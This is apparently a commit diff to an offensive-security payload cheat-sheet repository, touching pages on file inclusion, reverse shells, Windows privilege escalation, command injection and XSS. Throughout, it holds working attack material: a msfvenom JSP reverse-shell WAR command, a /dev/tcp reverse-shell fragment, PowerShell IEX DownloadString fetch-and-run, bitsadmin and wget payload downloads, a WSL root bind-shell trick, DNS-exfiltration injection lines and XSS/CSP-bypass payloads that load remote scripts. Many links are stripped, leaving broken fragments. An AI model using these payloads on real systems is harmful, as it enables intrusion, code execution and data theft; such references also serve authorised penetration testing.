Architecture - Files/Intruder/Images and README + template
@ -10,4 +10,5 @@ wp-admin.php
@ -1,13 +1,16 @@
# Local/Remote File Inclusion
# File Inclusion - Path Traversal
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
## Summary
* [Path Traversal](#path-traversal)
* [Basic LFI](#basic-lfi)
* [Basic RFI](#basic-rfi)
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
* [Wrapper php://filter](l#wrapper-phpfilter)
* [Wrapper php://filter](#wrapper-phpfilter)
* [Wrapper zip://](#wrapper-zip)
* [Wrapper data://](#wrapper-data)
* [Wrapper expect://](#wrapper-expect)
@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
## Path Traversal
Linux - Interesting files to check out :
@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa
Other easy win files.
## Basic LFI
@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
nmap -sn -n --disable-arp-ping | grep -v "host down"
-sn : Disable port scanning. Host discovery only.
-n : Never do DNS resolution
* Basic NMAP
@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while rea
### War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
### Lua
Linux only
@ -1,7 +1,5 @@
# Windows - Privilege Escalation
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](
## Windows Version and Configuration
@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
### Password in unattend.xml
### Passwords in unattend.xml
Location of the unattend.xml files
@ -167,7 +165,7 @@ Example content
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
## Processes Enum
## Processes Enumeration
What processes are running?
@ -187,36 +185,32 @@ Do you have powershell magic?
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
## Uploading / Downloading files
## Using PowerSploit's PowerUp
a wget using powershell
powershell -Noninteractive -NoProfile -command "wget -UseBasicParsing -OutFile %TEMP%\wget.exe"
wget using bitsadmin (when powershell is not present)
cmd /c "bitsadmin /transfer myjob /download /priority high %TEMP%\wget.exe"
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
## Spot the weak service using PowerSploit's PowerUP
Spot the weak service using PowerSploit's PowerUp
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks
## Using Windows Subsystem for Linux (WSL)
Technique borrowed from [Warlockobama's tweet](
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
## Thanks to
* [The Open Source Windows Privilege Escalation Cheat Sheet by and @xxByte](
* [Basic Linux Privilege Escalation](
* [Windows Privilege Escalation Fundamentals](
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](
* [The SYSTEM Challenge](
* [The SYSTEM Challenge](
* [Windows Privilege Escalation Guide - absolomb's security blog](
Remote commands execution/Intruders/command_exec.txt → Remote commands execution/Intruder/command_exec.txt
Executable file → Normal file
@ -152,6 +152,10 @@ Based on the tool from `` also hosted at dnsbi
for i in $(ls /) ; do host "http://$"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.')
## Thanks to
* [SECURITY CAFÉ - Exploiting Timed Based RCE](
SQL injection/Intruders/Auth_Bypass2.txt → SQL injection/Intruder/Auth_Bypass2.txt
Executable file → Normal file
SQL injection/Intruders/Generic_ErrorBased.txt → SQL injection/Intruder/Generic_ErrorBased.txt
Executable file → Normal file
SQL injection/Intruders/Generic_UnionSelect.txt → SQL injection/Intruder/Generic_UnionSelect.txt
Executable file → Normal file
Before Width: | Height: | Size: 179 KiB After Width: | Height: | Size: 179 KiB |
Before Width: | Height: | Size: 381 KiB After Width: | Height: | Size: 381 KiB |
Before Width: | Height: | Size: 106 KiB After Width: | Height: | Size: 106 KiB |
@ -168,7 +168,7 @@\@@


## SSRF via URL Scheme
Before Width: | Height: | Size: 44 KiB After Width: | Height: | Size: 44 KiB |
Server Side Template injections/Intruders/ssi_quick.txt → Server Side Template injections/Intruder/ssi_quick.txt
Executable file → Normal file
Tar commands execution/--checkpoint-action=exec=sh → Tar commands execution/Files/--checkpoint-action=exec=sh
Executable file → Normal file
Tar commands execution/--checkpoint=1 → Tar commands execution/Files/--checkpoint=1
Executable file → Normal file
Tar commands execution/ → Tar commands execution/Files/
Executable file → Normal file
Traversal directory/deep_traversal.txt → Traversal directory/Intruder/deep_traversal.txt
Executable file → Normal file
Traversal directory/directory_traversal.txt → Traversal directory/Intruder/directory_traversal.txt
Executable file → Normal file
Traversal directory/dotdotpwn.txt → Traversal directory/Intruder/dotdotpwn.txt
Executable file → Normal file
XSS injection/Intruders/jsonp_endpoint.txt
Normal file
@ -0,0 +1,54 @@
"><embed src='//\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
"><script src=//></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//></script>
@ -778,6 +778,8 @@ Check the CSP on [](https://csp-evaluator.wi
More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
### Bypass CSP by [](
Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here]("iframe"%29;"pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)
Normal file
@ -0,0 +1,26 @@
# Vulnerability Title
> Vulnerability description - reference
- [Tool name - description](
## Summary
* [Something](#something)
* [Something](#something)
* [Subentry 1](#sub1)
* [Subentry 2](#sub2)
## Something
Quick explanation
## Reference
- [Blog title - Author, Date](